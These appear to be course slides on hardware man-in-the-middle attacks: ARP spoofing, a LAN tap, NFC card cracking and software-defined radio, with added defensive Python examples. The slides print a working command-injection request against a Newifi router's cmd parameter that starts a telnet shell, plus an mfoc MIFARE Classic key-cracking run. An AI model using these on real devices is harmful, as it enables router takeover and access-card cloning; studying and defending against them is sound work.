Hardware-based man-in-the-middle attacks

Presentation slides for the Introduction to Reliability course, describing the intrusion-detection platform I built myself. It covers:

  • Man-in-the-Middle Attack (MITM, 中间人攻击)
  • Lan Tap
  • WiFi Hacking
  • NFC Hacking
  • Software Defined Radio

Man-in-the-Middle Attack (MITM)

  • Phone tapping (wiretapping a telephone line)

  • ARP spoofing

The attacker sends spoofed ARP messages onto a local area network so that traffic meant for a given IP address is delivered to the attacker instead. (Countermeasures: APT defence equipment, firewall.)

(Figure: ARP_Spoofing)
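How a host on the segment can notice the spoofing described above, as an added example that is not part of the original slides: a minimal detector that remembers the first IP-to-MAC binding it sees in ARP replies and raises an alert when a binding changes or when one MAC starts answering for several IP addresses (the gateway plus its own). The ARP replies are constructed for the demo; in practice they would come from a packet capture.

```python
"""Added example (not from the original slides): ARP-spoofing detector run
over a constructed list of ARP replies."""
from collections import defaultdict

# Constructed ARP replies as (sender_ip, sender_mac).  In a real deployment
# these would be taken from captured ARP packets with opcode 2 (reply).
SAMPLE_ARP_REPLIES = [
    ("192.168.99.1",  "aa:bb:cc:00:00:01"),   # the real gateway
    ("192.168.99.20", "aa:bb:cc:00:00:20"),   # an ordinary host
    ("192.168.99.30", "aa:bb:cc:00:00:30"),   # the spoofing host's own address
    ("192.168.99.1",  "aa:bb:cc:00:00:30"),   # it now claims the gateway IP
]


def detect_arp_spoofing(replies):
    """Return a list of alert strings for suspicious ARP replies.

    Two conditions are flagged:
      * an IP address that was bound to one MAC is later claimed by another;
      * a single MAC address that claims more than one IP address.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac          # first binding seen is trusted
        elif known != mac:
            alerts.append(f"binding changed: {ip} was {known}, now {mac}")
        newly_claimed = ip not in mac_to_ips[mac]
        mac_to_ips[mac].add(ip)
        if newly_claimed and len(mac_to_ips[mac]) > 1:
            alerts.append(f"{mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print("ALERT:", line)
```

Trusting the first binding is the weak point of this approach: a detector started after the spoofing began learns the wrong gateway MAC. Static ARP entries for the gateway, or Dynamic ARP Inspection on the switch, remove that dependency.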

LAN Tap

A small, simple device for passively monitoring Ethernet communications.

RJ45 connector, T568B pair layout

Test

Finished build

Sniffing packets

WiFi router (Lenovo Newifi)

CGI vulnerability

http://192.168.99.1/cgi-bin/luci/;stok=XXXXXXXX/admin/wifi_home

The cmd parameter of the comcmd endpoint is handed to a shell, so a pipe in it runs a second command (decoded form):

newwifi/comcmd?cmd=busybox telnetd -p 23|mfg2 telnet 1

The same request URL-encoded:

newwifi/comcmd?cmd=busybox%20telnetd%20-p%2023|mfg2%20telnet%201
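Why the request above works and how the handler should have been written, as an added example that is not code from the Newifi firmware: the vulnerable pattern passes the cmd value to a shell as one string, so the pipe is interpreted; the hardened version rejects shell metacharacters, allows only a fixed set of programs, restricts argument characters and returns an argv list for subprocess.run() without a shell. The query string is the one from the slide; the handler functions, the allow-list and the argument pattern are assumptions made for the demo.

```python
"""Added example (not Newifi code): vulnerable vs. hardened handling of a
CGI `cmd=` parameter."""
import re
import shlex
from urllib.parse import parse_qs

# The URL-encoded query string from the slide, reproduced here as input.
ENCODED_QUERY = "cmd=busybox%20telnetd%20-p%2023|mfg2%20telnet%201"

# Hypothetical allow-list: the only programs this endpoint may launch.
ALLOWED_COMMANDS = {"ping", "traceroute"}
SHELL_METACHARACTERS = set("|;&$`<>(){}\n\r")
SAFE_ARG = re.compile(r"^[A-Za-z0-9._:-]+$")


def unsafe_shell_line(query):
    """The vulnerable pattern: the raw parameter becomes a shell command line.

    Returned here instead of executed; in the real bug it would go to
    os.system()/popen(), where '|' starts a second command.
    """
    return parse_qs(query).get("cmd", [""])[0]


def validate_command(query):
    """Hardened handler: return an argv list safe for subprocess.run(argv),
    or raise ValueError if the request is rejected."""
    cmd = parse_qs(query).get("cmd", [""])[0]
    bad = sorted(ch for ch in set(cmd) if ch in SHELL_METACHARACTERS)
    if bad:
        raise ValueError(f"shell metacharacters in cmd parameter: {bad}")
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"program not permitted: {argv[:1]}")
    for arg in argv[1:]:
        if not SAFE_ARG.match(arg):
            raise ValueError(f"argument rejected: {arg!r}")
    return argv   # e.g. subprocess.run(argv, shell=False, timeout=10)


if __name__ == "__main__":
    print("vulnerable handler would run:", unsafe_shell_line(ENCODED_QUERY))
    try:
        validate_command(ENCODED_QUERY)
    except ValueError as err:
        print("hardened handler rejects it:", err)
    print("accepted:", validate_command("cmd=ping%20-c%201%20192.168.99.1"))
```

The allow-list check is the important one: stripping metacharacters alone still lets a caller run any program the CGI user can reach, while an argv list with shell=False and a fixed program set removes the shell from the path entirely.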

Adding a TTL serial connector

NFC Hacking (RDM8800)

RDM8800 = Arduino + PN532

nfc-list

nfc-list uses libnfc 1.7.1
NFC device: pn532_uart:/dev/ttyUSB0 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
       UID (NFCID1): fa  d6  9c  08  
      SAK (SEL_RES): 08

mfoc -O mycard.mfd

ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
  UID (NFCID1): fa  d6  9c  08  
  SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [.............xx.]
[Key: a0a1a2a3a4a5] -> [/............xx.]
[Key: d3f7d3f7d3f7] -> [/............xx.]
[Key: 000000000000] -> [/............xx.]
[Key: b0b1b2b3b4b5] -> [/............xx.]
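What the mfoc key table above tells an auditor, as an added example that is not part of the original slides or of mfoc: a parser for the "[Key: ...] -> [....]" lines that turns the per-sector symbols into a report of which sectors of the 1K card still open with a well-known default key. The input is the output shown above, embedded here as a constructed string.

```python
"""Added example (not mfoc code): audit which MIFARE Classic sectors still
use default keys, from mfoc's key-probe output."""
import re

# The probe output from the slides, reproduced as a constructed input string.
MFOC_OUTPUT = """\
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [.............xx.]
[Key: a0a1a2a3a4a5] -> [/............xx.]
[Key: d3f7d3f7d3f7] -> [/............xx.]
[Key: 000000000000] -> [/............xx.]
[Key: b0b1b2b3b4b5] -> [/............xx.]
"""

# One symbol per sector: '.' none, '/' key A, '\' key B, 'x' both.
LINE_RE = re.compile(r"\[Key: ([0-9a-fA-F]{12})\] -> \[([./\\x]+)\]")


def parse_mfoc_keys(text):
    """Map sector number -> {"A": set, "B": set} of default keys that opened it."""
    sectors = {}
    for key, symbols in LINE_RE.findall(text):
        key = key.lower()
        for sector, sym in enumerate(symbols):
            entry = sectors.setdefault(sector, {"A": set(), "B": set()})
            if sym in "/x":
                entry["A"].add(key)
            if sym in "\\x":
                entry["B"].add(key)
    return sectors


def default_key_exposure(text):
    """Sectors opened by at least one default key, with the keys sorted."""
    return {
        sector: {"A": sorted(e["A"]), "B": sorted(e["B"])}
        for sector, e in parse_mfoc_keys(text).items()
        if e["A"] or e["B"]
    }


def closed_sectors(text):
    """Sectors for which no probed default key worked for either key slot."""
    return sorted(s for s, e in parse_mfoc_keys(text).items()
                  if not e["A"] and not e["B"])


if __name__ == "__main__":
    for sector, keys in sorted(default_key_exposure(MFOC_OUTPUT).items()):
        print(f"sector {sector:2d}: A={keys['A']} B={keys['B']}")
    print("no default key found for sectors:", closed_sectors(MFOC_OUTPUT))
```

For the card above, sector 0 opens with four of the five default A keys and sectors 13 and 14 open with every probed key for both slots; only the remaining sectors were rekeyed. A card with any default-keyed sector should be treated as unprotected: rekey every sector, and since MIFARE Classic's Crypto-1 cipher is itself broken, plan a move to a card family with a current cipher.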

Improvements

SDR - Software Defined Radio

TV tuner dongle (RTL2832U):

USB DVB-T & RTL-SDR, Realtek RTL2832U & R820T: the RTL2832U is a Realtek chip model originally made for DVB-T TV tuner dongles.

It was later found to have a very wide receive frequency range, and has since been repurposed for SDR applications (RTL-SDR).

HackRF

  • SDR peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz.
  • Designed to enable test and development of modern and next generation radio technologies.
  • HackRF One is an open source hardware platform that can be used as a USB peripheral or programmed for stand-alone operation.

Alternative: bladeRF (supports USB 3.0, covers 300 MHz to 3.8 GHz)

Dump1090

Open-source ADS-B software: a Mode S decoder specifically designed for RTL-SDR devices.

Antenna

L ≈ (c / f) × 0.96, where c is the speed of light, f the operating frequency and 0.96 the shortening factor applied to the free-space wavelength

Acrylic